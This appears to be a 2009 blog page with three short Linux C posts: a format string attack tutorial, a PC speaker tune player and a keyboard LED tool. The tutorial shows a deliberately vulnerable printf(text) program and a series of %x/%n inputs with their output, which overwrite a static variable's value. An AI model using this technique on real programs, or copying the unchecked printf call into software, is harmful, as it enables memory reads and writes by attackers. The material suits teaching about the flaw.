2009-12-25 Linux Format String Attack 1
Format string attack is attack for C formated strings. Format string function is prinrf() there are other
functions that support format string.
C code for bad used printf():
int main( int argc, char **argv ) { static int i = 0; char text[1000]; strcpy(text, argv[1]); printf("%.8x\n",&i); printf("No way it never will works because value of i=%d\n",i); printf( text ); printf("\nValue of i=%d\n",i); return 0; }First output is adress of static i
Than we outputing values of i and call printf() with first argument fo prgramm.
and then watching value if i
Run: ./e1 'Halolo'
Output:
08049674 No way it never will works because value of i=0 Halolo Value of i=0Run: ./e1 'Halolo%s'
Output:
08049674 No way it never will works because value of i=0Halolo(null) Value of i=0
Run: ./e1 $'\x74\x96\x04\x08_%x'
Output:
08049674 No way it never will works because value of i=0 t�_0 Value of i=0
Read about %n in format string:
Run: ./e1 $'\x74\x96\x04\x08_%x_%n'
Output:
08049674 No way it never will works because value of i=0 Segmentation faultRun: ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output:
08049674 No way it never will works because value of i=0 t�_0_8_40_4_4_ Value of i=16Run: ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output:
08049674 No way it never will works because value of i=0 t�_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000004_ Value of i=1216
Now you can input almost any value to i
2009-12-14 Linux PC speaker
PC speaker can make sound you whant. Here is small PC speaker player. Set notes , set time
delay and you on. You shold run this code under root if nothing happends.
int main() { int rc,i; note *curent_song; curent_song = song; struct timespec t1; rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*8*64+7*8+7); //open cosole if (rc == 0) rc = 1; ioctl( rc, KIOCSOUND , 0 ); ioctl( rc , KDSETLED , 7 ); i = 0; while ( curent_song[i].n != 0 ) { ioctl( rc , KIOCSOUND , curent_song[i].n ); msleep( (curent_song[i].t) ); ioctl( rc , KDSETLED , i&0x0007 ); i++; } ioctl( rc , KDSETLED , 0 ); ioctl( rc, KIOCSOUND , 0 ); return 0; }
2009-12-12 Linux keyboard LED
Send some bytes and flash LED on you keyboards.
Run it under root. There will no be any errors if something happens.
Usage:
kbled [NumLock] [CapsLock] [ScrLock]
kbled 0 0 0
#include <stdlib.h> #include <fcntl.h> #include <sys/syscall.h> #include <linux/kd.h> int main( int argc , char **argv ) { int rc,i; if (argc != 4) exit(0); rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*64+7*8+7); //open cosole if (rc == 0) rc = 1; i = (argv[1][0]-'0')*2+(argv[2][0]-'0')*4+(argv[3][0]-'0'); ioctl( rc , KDSETLED , i ); return 0; }